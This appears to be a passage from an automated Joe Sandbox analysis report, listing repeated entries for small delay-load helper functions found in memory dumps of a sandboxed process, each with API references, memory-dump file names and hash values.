Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: df807191a028c22304da520b4a2c76c875ab48b2dd43279b04742d79714ba710
Instruction ID: 0e926dfa2cbeb30394be9dd787f9d0c166f465c6f9f07035a40c7e47d2576a53
Opcode Fuzzy Hash: df807191a028c22304da520b4a2c76c875ab48b2dd43279b04742d79714ba710
Instruction Fuzzy Hash: 39B012C129828C7D710C61549D02C7B010CC3C0F20330403EF519C59A1ED400C412471

Uniqueness

Uniqueness Score: -1.00%

Function 000FE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE580

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2cbdeb058227375f3412ad1f90e9e91f4133ab3e049d168b8e7f82858f20271f
Instruction ID: e63afccc854bdb3c38d486d97bbf4994b6012c09887795863605bdf06b4e6a65
Opcode Fuzzy Hash: 2cbdeb058227375f3412ad1f90e9e91f4133ab3e049d168b8e7f82858f20271f
Instruction Fuzzy Hash: 30B012C12982887C71086154DE02C7B011CC3C0F20334423EF519C59A1EE400D422471

Uniqueness

Uniqueness Score: -1.00%

Function 000FE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE580

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2da335cd0cc83ec32f6e70db5856cb8df97ebbba861e62ad34ff3223e130b971
Instruction ID: aa0f9d7f905af06cb2620779bac62b253216838c40e23128d37bbd2cb7318a55
Opcode Fuzzy Hash: 2da335cd0cc83ec32f6e70db5856cb8df97ebbba861e62ad34ff3223e130b971
Instruction Fuzzy Hash: 5AB012C12983887C71486154DD03C7B011CC3C0F20334423EF519C59A1EE400C812471

Uniqueness

Uniqueness Score: -1.00%

Function 000FE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 62606f4f7f76207a3667342c21f5fe543d3bada6cc7cab6be7cc52c1fd116bf3
Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
Opcode Fuzzy Hash: 62606f4f7f76207a3667342c21f5fe543d3bada6cc7cab6be7cc52c1fd116bf3
Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870

Uniqueness

Uniqueness Score: -1.00%

Function 000FE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4353db3333fc0f9499554db7bf2e0e90e7e7c6c9bf5a9eda208ed8675a36e2ab
Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
Opcode Fuzzy Hash: 4353db3333fc0f9499554db7bf2e0e90e7e7c6c9bf5a9eda208ed8675a36e2ab
Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870

Uniqueness

Uniqueness Score: -1.00%

Function 000FE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f6842ed2f083c4e8a02bc4d0de6f49ca9376249fb1be4f7e0168024a71470798
Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
Opcode Fuzzy Hash: f6842ed2f083c4e8a02bc4d0de6f49ca9376249fb1be4f7e0168024a71470798
Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870

Uniqueness

Uniqueness Score: -1.00%

Function 000FE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ce694510998c28e0d4fe41327b27a6c436552b14092c6cda3e913f9d81e832c3
Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
Opcode Fuzzy Hash: ce694510998c28e0d4fe41327b27a6c436552b14092c6cda3e913f9d81e832c3
Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870

Uniqueness

Uniqueness Score: -1.00%

Function 000FE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8febd6839a7b472b51aac3d0b8ef17d0fcfb5d876aa224d01f0311119e0ab59a
Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
Opcode Fuzzy Hash: 8febd6839a7b472b51aac3d0b8ef17d0fcfb5d876aa224d01f0311119e0ab59a
Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870

Uniqueness

Uniqueness Score: -1.00%

Function 000FE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fbe0805510eecfd5da87d4071480d75f0755e73e626bce67d6ed0dd8834a280c
Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
Opcode Fuzzy Hash: fbe0805510eecfd5da87d4071480d75f0755e73e626bce67d6ed0dd8834a280c
Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870

Uniqueness

Uniqueness Score: -1.00%

Function 000FE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bc820032ed3622b1a0880f7c7daddf1a4a940f87742772f023b64617435a9db1
Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
Opcode Fuzzy Hash: bc820032ed3622b1a0880f7c7daddf1a4a940f87742772f023b64617435a9db1
Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870

Uniqueness

Uniqueness Score: -1.00%

Function 000FE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b81e9fd7e8f33c4cbf0f716cf6b11711df3c1c03a885548aee1f1402af9bd77f
Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
Opcode Fuzzy Hash: b81e9fd7e8f33c4cbf0f716cf6b11711df3c1c03a885548aee1f1402af9bd77f
Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870

Uniqueness

Uniqueness Score: -1.00%

Function 000FE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4b6d32c2bb47c467f26c45cb5582e770679420693cbe24ab74ab5ff2c6a7be99
Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
Opcode Fuzzy Hash: 4b6d32c2bb47c467f26c45cb5582e770679420693cbe24ab74ab5ff2c6a7be99
Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870

Uniqueness

Uniqueness Score: -1.00%

Function 000FE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d54123d6dabfd96f32e5be2ba533ab22f08fe72ff952218cd08ac8aefdeaa4bd
Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
Opcode Fuzzy Hash: d54123d6dabfd96f32e5be2ba533ab22f08fe72ff952218cd08ac8aefdeaa4bd
Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870

Uniqueness

Uniqueness Score: -1.00%

Function 000FE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4ab03db20d400b53138adf418345be7a1fc47bc92a2f341de4a85c751df1af0f
Instruction ID: 4ffc8fb73d2683e800e25dbaaa58aafc4614323b37b8e972d42957dff2d4dfca
Opcode Fuzzy Hash: 4ab03db20d400b53138adf418345be7a1fc47bc92a2f341de4a85c751df1af0f
Instruction Fuzzy Hash: D1A012E11942C53C700C21009C0AC7B021CC1C0B20330402DF515908915C4008412472

Uniqueness

Uniqueness Score: -1.00%

Function 000FE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c16912460591f2d779a8b270e6ed5d075a146893abc5b03a1eb53111014f007b
Instruction ID: 6e694c17cd7b9fea3057b4d9896d85b4d0ba10e267ef84bb201b5f27e59b18d5
Opcode Fuzzy Hash: c16912460591f2d779a8b270e6ed5d075a146893abc5b03a1eb53111014f007b
Instruction Fuzzy Hash: 0CA012E11982C57C700C21009C0AC7B021CC1C0B60330442DF506808915C4008412472

Uniqueness

Uniqueness Score: -1.00%

Function 000FE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1afdf7e1e0900deb89971691ce191539daa820545079e0ba173fd755b103008d
Instruction ID: 6e694c17cd7b9fea3057b4d9896d85b4d0ba10e267ef84bb201b5f27e59b18d5
Opcode Fuzzy Hash: 1afdf7e1e0900deb89971691ce191539daa820545079e0ba173fd755b103008d
Instruction Fuzzy Hash: 0CA012E11982C57C700C21009C0AC7B021CC1C0B60330442DF506808915C4008412472

Uniqueness

Uniqueness Score: -1.00%

Function 000FE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
